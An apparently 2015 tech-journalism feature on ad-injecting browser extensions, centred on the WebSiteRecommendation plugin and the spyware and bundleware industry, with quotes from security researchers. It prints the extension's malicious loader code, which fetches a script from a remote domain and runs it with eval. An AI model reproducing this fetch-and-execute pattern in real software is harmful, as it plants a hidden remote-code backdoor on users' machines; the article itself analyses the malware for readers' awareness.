Clickjackers: Inside The Strange New World Of Modern Spyware

If you were lucky or, in truth, unlucky enough to download a Chrome and Firefox extension from a site called WeLikeTheWeb.com in 2014 you’d be presented with not much more than a website recommendation engine that you’d probably ignore or uninstall. The app, on its surface, was innocuous. But, if you left it running, you’d be bumping into a fascinating bit of software that points to a new era of spyware that uses your computer in new and nefarious ways and is even sometimes VC-funded.

On the surface, the extension (which is currently reading as malware according to most virus scanners and is effectively dead) brings up pop-ups as you browse. However, if you’re an affiliate marketer – essentially a website creator who makes money by sending customers to pages like booking.com or brazzers.com – you would find lots to hate about WeLikeTheWeb’s WebSiteRecommendation plugin. It is an ad injector, a tool that steers users away from “legitimate” advertisements and injects both images and HTML into your browsing experience. Google estimates that five percent of web users are running ad injectors without knowing it and it’s driving marketers crazy – and it makes for some fascinating code.

Under The Hood

On the surface the plugin is completely mundane. You can look at the code here. It seems to do work as advertised by bringing up suggestions when you browse but when you dig further into the app you find some interesting things. Except for one line that invites in a world of hurt.

Take a look at this bit of code:

var website_rec = new function() {
// consts
this.REMOTE_URL = "http://utils.cdneurope.com/js/link-ff.js";

// fields
this.ajaxRequest = null;

this.init = function() {
try {
this.ajaxRequest = Components.classes[‘@mozilla.org/xmlextras/xmlhttprequest;1’].createInstance(Components.interfaces.nsIXMLHttpRequest);
this.ajaxRequest.open(‘GET’, this.REMOTE_URL, true);
this.ajaxRequest.setRequestHeader(‘Cache-Control’, ‘no-cache’);
this.ajaxRequest.channel.loadFlags |= Components.interfaces.nsIRequest.LOAD_BYPASS_CACHE;

this.ajaxRequest.onreadystatechange = function() {
try {
if (this.readyState == 4 && this.status == 200) {
eval(unescape(this.responseText));
}
}
catch (ex) {}
}
this.ajaxRequest.send(null);
} catch(ex) { }
}

this.init();
}

The important bit is at the top. You see, the plugin accesses and runs a file hidden on a website called utils.cdneurope.com.

CDNEurope is a tough nut to crack – tracing it to a geographical source is impossible because the farthest you get is XLHost.com, a hosting company – but it serves up malware in seconds. The domain registrar is hidden and emails to the company remained unanswered.

This code could do anything, and to the average user what it does would be invisible. In fact it’s decidedly difficult to tease out exactly what is going on.

The file, according to VirusTotal seems to be clean. The code, however, is clearly obfuscated:

Screen Shot 2015-04-17 at 12.26.01 PM

This encryption system – which is really a way to reduce the file size and prevent snooping inside JavaScript files – is trivial to expand into readable code. But what does it do? In this matryoshka doll of code, the real activity is further obfuscated and the functionality can only be accessed once the code is running. Imagine a car whose doors only unlock, allowing you to get in, when it’s going 60 miles per hour. Once you do crack it, however, you find something quite interesting.

Here’s the money shot:

Screen Shot 2015-04-17 at 12.38.24 PM

Notice the URLs. In this particular case, the software changes affiliate links – the codes advertisers embed in their websites to make a little money – on the fly. Instead of an affiliate getting credit for a click to Booking.com, for example, this malware hijacks the link and sends the credit somewhere else. If a customer clicks a link for brazzers.com [NSFW] the malware steps in, sending the advertising money to another user. In short, the chrome extension is skimming pennies off of everyday web transactions and, in turn, making a fortune.

“There is some very interesting stuff going on which likely is designed to avert any code signing attempts by Google on Chrome plugins that are intended to redirect users to ad sites,” said Matt Harrigan, CEO of Packetsled. “The interesting part is that they seem to be successful, and this doesn’t appear to be exclusive to Chrome. There’s Firefox specific code in several other files that is further obfuscated from the initial script. We feel that this may lead to a wider-spread problem than just a simple click jacking.”

Meet The New Boss, Same As The Old Boss

Most of the users of WebSiteRecommendation caught the malware from uTorrent, a Torrent downloading program. Even today, a year after WSR seemingly closed shop, uTorrent sometimes still bundles something called MyBrowserBar and recently came under fire for bundling a bit of Bitcoin mining bloatware that later turned out to be a sort of not-for-profit donation system that used spare cycles to raise money for charity. Whatever you call it – malware, bloatware, spyware – the software appears and disappears with alarming regularity and today’s well-meaning charity application can be tomorrow’s clickjacker.

“Many of today’s more advanced malware includes spyware functionality, but we also see Spyware distributed with software bundles,” said Grayson Milbourne, security intelligence director at Webroot. “These come in the form of an installer for a desired application which has been wrapped with a new installer that offers many additional applications. Often referred to as PUA’s (potentially unwanted applications) these applications often offer coupons or in some way interact with the web browser. These programs contain EULA’s that are very broad and enable them to use the data they observe in any way, often to fuel directed advertising.”

Not all spyware starts off bad. Many apps turn bad once they’re acquired by a less-scrupulous owner. Some apps even turn to the light side of the Force when they’re acquired by a legitimate owner.

“Often this is the result of a Spyware company being acquired by a more trustworthy company who changes their practices,” said Milbourne. “When this occurs, the new company will reach out to the AV community to clear their name. This process is often tough to accomplish as there are so many AV’s out there and often results in a mix of detection by vendors.”

Experts believe that Peak Spyware happened in 2005 when the Internet was still fairly new. New techniques for nabbing bad guys have made it harder and harder to driver advertising and steal clicks.

“In the years since, Google has basically made ‘spyware’ obsolete, more or less. It certainly isn’t like it once was,” said Sean Sullivan, security advisor for F-Secure. “In 2006, somebody would be baited into downloading a screen saver and without their knowledge, tracking software would be included or installed alongside. These days such tracking software is bundled (crapware) and it is much more a case of buyer beware. In popular use, spyware has come to mean software that actual spies use to spy on suspects/targets. A lot of what we used to call ‘spyware’ is often classified as risk ware/monitoring tools or potentially unwanted software.”

The euphemistically named PUAs sound harmless but they’re still doing real damage – just ask the countless users who found themselves left vulnerable when Lenovo included Superfish on its laptop bloatware. Modern operating systems are getting better at controlling who and what manages your info, but there are still plenty of 0-day hacks that can steal our time, information, and money.

clickjackers-mid

Spyware and PUA writers are getting smarter, our systems are in danger and new tools are being built every day. And there’s money to be made. Randy Abrams, research director at NSS Labs, says that lobbyists are trying to actively prevent anti-spyware regulation, a decidedly scary thought.

“Spyware is ultimately defined by the amount of money spent on lobbying legislators,” said Abrams. “The advertising/marketing industry has extremely deep pockets. There are definitely marketing organizations who do not use [spyware] because they believe these tools and practices crosses a legal line. However, this viewpoint is probably not true of most of this industry’s organizations lobbying congress.”

Researchers are learning about new ways to marketers are trying to nail us and they’re even having a hard time renaming the spyware to reflect its changing nature. While many of us would call it malware, researchers are finding new spyware every day that is hidden from the user yet is still a threat.

“People who aren’t careful with the freeware they install will continue to get burned,” said F-Secure’s Sullivan. “There are numerous apps that overreach and threaten privacy. I’ve been trying to think of a new label for more than a year now. But ‘spyware’ just seems to be what people get.”